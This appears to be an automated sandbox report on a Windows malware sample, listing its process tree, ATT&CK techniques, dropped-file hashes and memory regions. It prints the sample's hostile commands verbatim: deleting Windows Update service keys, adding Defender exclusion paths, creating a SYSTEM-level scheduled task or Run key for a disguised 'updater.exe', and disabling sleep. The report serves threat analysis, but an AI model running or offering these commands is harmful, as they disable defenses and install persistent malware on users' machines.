- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:4032
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:3168
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    - Modifies security service
    PID:4044
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4480
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:4284
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:1800
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4440
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4036
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1588
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1488
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
  2⤵
  PID:4164
- - C:\Windows\system32\schtasks.exe
    "C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
    3⤵
    PID:1216
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:2084
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
  2⤵
  PID:1700
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:4564
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4908
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:1572
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:716
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:3184
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
    3⤵
    PID:2700
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
    3⤵
    PID:936
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
    3⤵
    PID:3284
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
    3⤵
    PID:4360
- - C:\Windows\System32\reg.exe
    reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
    3⤵
    PID:1324
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:2364
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    PID:3496
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    PID:3336
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    PID:4344
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:3832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  PID:1584
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe zuhwtyqtfkk
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  PID:2124
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4532
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController GET Name, VideoProcessor
    3⤵
    - Detects videocard installed
    PID:1504
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
  2⤵
  - Drops file in Program Files directory
  PID:4184
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe ozascextlcafxrlv 6E3sjfZq2rJQaxvLPmXgsH8HqLgRgcx0/LVDxBdghhCp2+hEkY7tykSHwITYgOlci3ytMC8bvXFdgLfubt31d00EGUNZvUBUebLdyQcn06lc9XyK+SQQg4bEvwPCdT2KYoSnyaznjkuq+t/WEmnCxetIZsxpO3p/zzwJI2q0v1rwbWjqgzbDndc3ETa3aKYf8EOpU9uqIUcKKIP5glSGIF5NNBIQIOxiwAszeRmTD+ssM2JwNB+ZJXRJvy123U7UEXSTx71FLoxpDYVaIMhOE++Mr3hazCz1q4t4s5o8+wL0kdpUV5VnrG7JmlnWotU5n89qBghGm+y6SMYnw4GovlYYIKPio/EJCBO4ISkMSM9oXvdK2xwDd7nOPHNI0ub2+9+yDpmbkJhXPRjLmh8EzH9no+cA8XXsDqc7l4Il6Q8HZCkxxQKp3X7QrvGtORgpsiUFRUsjuuqKF8OZDBQ643uz5XTg02QKOJfFPdU0JLRX+q6NZJdak+3EYZdI36Zgtv5L8IJAttmNYCJqIJTseVMH04bRJ5WBnXqRYehi2MM0O1YRQDI8kKVhBta2xSurnVpcEWelFYwmZuF8Vd3YhHb8yAOoY//KgjosTtbU5Co=
  2⤵
  - Modifies data under HKEY_USERS
  PID:4144

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:4492

C:\Program Files\Notepad\Chrome\updater.exe
"C:\Program Files\Notepad\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1812

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:1684

C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe
1⤵
- Executes dropped EXE
PID:3852

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Impair Defenses

T1562

Modify Registry

T1112

Web Service

T1102

Credential Access

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Google\Libs\g.log

Filesize
226B

MD5
fdba80d4081c28c65e32fff246dc46cb

SHA1
74f809dedd1fc46a3a63ac9904c80f0b817b3686

SHA256
b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398

SHA512
b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Program Files\Notepad\Chrome\updater.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
440cb38dbee06645cc8b74d51f6e5f71

SHA1
d7e61da91dc4502e9ae83281b88c1e48584edb7c

SHA256
8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

SHA512
3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
42cc9ff3509672894beabcd392a00c43

SHA1
c12dc74a6c8a8e1f8f4033d31495ebb09d70e9ab

SHA256
352d90b619218e7bf297219c1468e9ea487c9002e28984ec70a963088dff3579

SHA512
c876de012d1b237463b2c2a4195e050c2ddbdf5725aa2553313525ecb6a4a3f0cda9a289f257b886395da6407b5173451e95df89665ae1c727c6be3753a89271

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b09e5e7765cc1b17180c5e0b6257584f

SHA1
7f5b4a711e5db38197a48ee4800b280f6256a36c

SHA256
5815111e1db113468bdc6103bc6dda28d3615196dd79e3ca0ea00928332fcd94

SHA512
a53d93dbc7281f6c8746968cc4f66faecf3d91633be0b75d43d0366cdc97603fd6aa5a87b927e22dafe5dad79d8d4b91613c1a0ef31693250c488c2288de0d1f

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000020001\XandETC.exe

Filesize
3.7MB

MD5
3006b49f3a30a80bb85074c279acc7df

SHA1
728a7a867d13ad0034c29283939d94f0df6c19df

SHA256
f283b4c0ad4a902e1cb64201742ca4c5118f275e7b911a7dafda1ef01b825280

SHA512
e8fc5791892d7f08af5a33462a11d39d29b5e86a62cbf135b12e71f2fcaaa48d40d5e3238f64e17a2f126bcfb9d70553a02d30dc60a89f1089b2c1e7465105dd

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\207aa4515d\oneetx.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\2a344302.exe

Filesize
207KB

MD5
31e6d2018b345fe69bbc2cf8f69215b3

SHA1
7bd30d865386c349f3c29c9d85fda0a7ad76111d

SHA256
90e12268c6886da75cf395936df7635c52dfcd3bcf074396dd9c97fa55c9eb5b

SHA512
fb294895a68f47ec54f66aae54fe1eaff8de4851c2105abd840eb1221be216197edc19bd0f5e4b0b42b045ce42ab07135e52d6f1087c930c5d75312fd8ebb021

Download Submit
C:\Users\Admin\AppData\Local\Temp\2a344302.exe

Filesize
207KB

MD5
31e6d2018b345fe69bbc2cf8f69215b3

SHA1
7bd30d865386c349f3c29c9d85fda0a7ad76111d

SHA256
90e12268c6886da75cf395936df7635c52dfcd3bcf074396dd9c97fa55c9eb5b

SHA512
fb294895a68f47ec54f66aae54fe1eaff8de4851c2105abd840eb1221be216197edc19bd0f5e4b0b42b045ce42ab07135e52d6f1087c930c5d75312fd8ebb021

Download Submit
C:\Users\Admin\AppData\Local\Temp\2a344302.exe

Filesize
207KB

MD5
31e6d2018b345fe69bbc2cf8f69215b3

SHA1
7bd30d865386c349f3c29c9d85fda0a7ad76111d

SHA256
90e12268c6886da75cf395936df7635c52dfcd3bcf074396dd9c97fa55c9eb5b

SHA512
fb294895a68f47ec54f66aae54fe1eaff8de4851c2105abd840eb1221be216197edc19bd0f5e4b0b42b045ce42ab07135e52d6f1087c930c5d75312fd8ebb021

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b0e5xarn.5jn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\newplayer.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\newplayer.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\newplayer.exe

Filesize
198KB

MD5
f0033521f40c06dec473854c7d98fa8b

SHA1
28dadfe642a0c308e1f744b0d87a6d22dd6cd55a

SHA256
4458a9df5275bedd921127f4ff9dc63d4ac107f2e89cf46969e96f4c43d9f93e

SHA512
f6758814fd20b613fe6f3df7a0a60488dcae59680c3487344a701f59dca972acbb1dd8041bd3fa8d3f97279193796dab9c7f98f1cab3e25686ca34c65e349217

Download Submit
C:\Users\Admin\AppData\Local\Temp\ss41.exe

Filesize
635KB

MD5
730f705fb43707395f4ff1c00e01f576

SHA1
7cba596e3912504bc4d87a03fbc0190aab7befe1

SHA256
b56459b00e75cd98b37de308113ff5d79584ee0715c82559f5dadd7539f2bc85

SHA512
73e62ed83978f508683d6b64568309f77590f94016ff3368285ceece30bf30f88cab9c3d5e233592361e30a6ec04633dd633d623b07c93410f9fc985db13025b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ss41.exe

Filesize
635KB

MD5
730f705fb43707395f4ff1c00e01f576

SHA1
7cba596e3912504bc4d87a03fbc0190aab7befe1

SHA256
b56459b00e75cd98b37de308113ff5d79584ee0715c82559f5dadd7539f2bc85

SHA512
73e62ed83978f508683d6b64568309f77590f94016ff3368285ceece30bf30f88cab9c3d5e233592361e30a6ec04633dd633d623b07c93410f9fc985db13025b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ss41.exe

Filesize
635KB

MD5
730f705fb43707395f4ff1c00e01f576

SHA1
7cba596e3912504bc4d87a03fbc0190aab7befe1

SHA256
b56459b00e75cd98b37de308113ff5d79584ee0715c82559f5dadd7539f2bc85

SHA512
73e62ed83978f508683d6b64568309f77590f94016ff3368285ceece30bf30f88cab9c3d5e233592361e30a6ec04633dd633d623b07c93410f9fc985db13025b

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
4KB

MD5
bdb25c22d14ec917e30faf353826c5de

SHA1
6c2feb9cea9237bc28842ebf2fea68b3bd7ad190

SHA256
e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495

SHA512
b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c

Download Submit
C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b42c70c1dbf0d1d477ec86902db9e986

SHA1
1d1c0a670748b3d10bee8272e5d67a4fabefd31f

SHA256
8ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a

SHA512
57fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5

Download Submit
memory/1356-219-0x0000017A14DD0000-0x0000017A14DF2000-memory.dmp

Filesize
136KB

Download
memory/1356-224-0x0000017A2D2E0000-0x0000017A2D2F0000-memory.dmp

Filesize
64KB

Download
memory/1356-225-0x0000017A2D2E0000-0x0000017A2D2F0000-memory.dmp

Filesize
64KB

Download
memory/1356-226-0x0000017A2D2E0000-0x0000017A2D2F0000-memory.dmp

Filesize
64KB

Download
memory/1584-319-0x00007FF48FCF0000-0x00007FF48FD00000-memory.dmp

Filesize
64KB

Download
memory/1584-318-0x0000029FD3B20000-0x0000029FD3B30000-memory.dmp

Filesize
64KB

Download
memory/1584-321-0x0000029FD3B29000-0x0000029FD3B2F000-memory.dmp

Filesize
24KB

Download
memory/1584-303-0x0000029FD3B20000-0x0000029FD3B30000-memory.dmp

Filesize
64KB

Download
memory/1584-297-0x0000029FD3B20000-0x0000029FD3B30000-memory.dmp

Filesize
64KB

Download
memory/1800-240-0x00000256BB230000-0x00000256BB240000-memory.dmp

Filesize
64KB

Download
memory/1800-241-0x00000256BB230000-0x00000256BB240000-memory.dmp

Filesize
64KB

Download
memory/1800-242-0x00000256BB230000-0x00000256BB240000-memory.dmp

Filesize
64KB

Download
memory/1812-327-0x00007FF6CAD00000-0x00007FF6CB0BD000-memory.dmp

Filesize
3.7MB

Download
memory/1812-259-0x00007FF6CAD00000-0x00007FF6CB0BD000-memory.dmp

Filesize
3.7MB

Download
memory/1812-324-0x00007FF6CAD00000-0x00007FF6CB0BD000-memory.dmp

Filesize
3.7MB

Download
memory/1920-201-0x0000000003440000-0x0000000003456000-memory.dmp

Filesize
88KB

Download
memory/2084-290-0x00000218CEC70000-0x00000218CEC8A000-memory.dmp

Filesize
104KB

Download
memory/2084-273-0x00000218CDBE0000-0x00000218CDBF0000-memory.dmp

Filesize
64KB

Download
memory/2084-285-0x00000218CE9E0000-0x00000218CE9FC000-memory.dmp

Filesize
112KB

Download
memory/2084-286-0x00000218CEAC0000-0x00000218CEACA000-memory.dmp

Filesize
40KB

Download
memory/2084-287-0x00007FF468270000-0x00007FF468280000-memory.dmp

Filesize
64KB

Download
memory/2084-288-0x00000218CEC30000-0x00000218CEC4C000-memory.dmp

Filesize
112KB

Download
memory/2084-289-0x00000218CEC10000-0x00000218CEC1A000-memory.dmp

Filesize
40KB

Download
memory/2084-275-0x00000218CDBE0000-0x00000218CDBF0000-memory.dmp

Filesize
64KB

Download
memory/2084-291-0x00000218CEC20000-0x00000218CEC28000-memory.dmp

Filesize
32KB

Download
memory/2084-292-0x00000218CEC50000-0x00000218CEC56000-memory.dmp

Filesize
24KB

Download
memory/2084-293-0x00000218CEC60000-0x00000218CEC6A000-memory.dmp

Filesize
40KB

Download
memory/2084-274-0x00000218CDBE0000-0x00000218CDBF0000-memory.dmp

Filesize
64KB

Download
memory/2124-333-0x00007FF6642F0000-0x00007FF664306000-memory.dmp

Filesize
88KB

Download
memory/2628-207-0x00007FF604420000-0x00007FF6047DD000-memory.dmp

Filesize
3.7MB

Download
memory/2628-246-0x00007FF604420000-0x00007FF6047DD000-memory.dmp

Filesize
3.7MB

Download
memory/3076-202-0x0000000000400000-0x00000000006DC000-memory.dmp

Filesize
2.9MB

Download
memory/3076-166-0x0000000000710000-0x0000000000719000-memory.dmp

Filesize
36KB

Download
memory/3380-179-0x0000000002A40000-0x0000000002BB0000-memory.dmp

Filesize
1.4MB

Download
memory/3380-180-0x0000000002BB0000-0x0000000002CE1000-memory.dmp

Filesize
1.2MB

Download
memory/3380-206-0x0000000002BB0000-0x0000000002CE1000-memory.dmp

Filesize
1.2MB

Download
memory/3948-136-0x00000000056F0000-0x0000000005756000-memory.dmp

Filesize
408KB

Download
memory/3948-135-0x00000000051F0000-0x0000000005200000-memory.dmp

Filesize
64KB

Download
memory/3948-134-0x0000000003150000-0x0000000003151000-memory.dmp

Filesize
4KB

Download
memory/3948-133-0x0000000000910000-0x0000000000D26000-memory.dmp

Filesize
4.1MB

Download
memory/4144-332-0x00000243F9540000-0x00000243F9560000-memory.dmp

Filesize
128KB

Download
memory/4144-331-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp

Filesize
8.0MB

Download
memory/4144-334-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp

Filesize
8.0MB

Download
memory/4144-335-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp

Filesize
8.0MB

Download
memory/4144-337-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp

Filesize
8.0MB

Download
memory/4144-326-0x00000243F9330000-0x00000243F9350000-memory.dmp

Filesize
128KB

Download
memory/4144-340-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp

Filesize
8.0MB

Download
memory/4144-341-0x00000243F9E50000-0x00000243F9E70000-memory.dmp

Filesize
128KB

Download
memory/4144-343-0x00007FF7EDFE0000-0x00007FF7EE7D4000-memory.dmp

Filesize
8.0MB

Download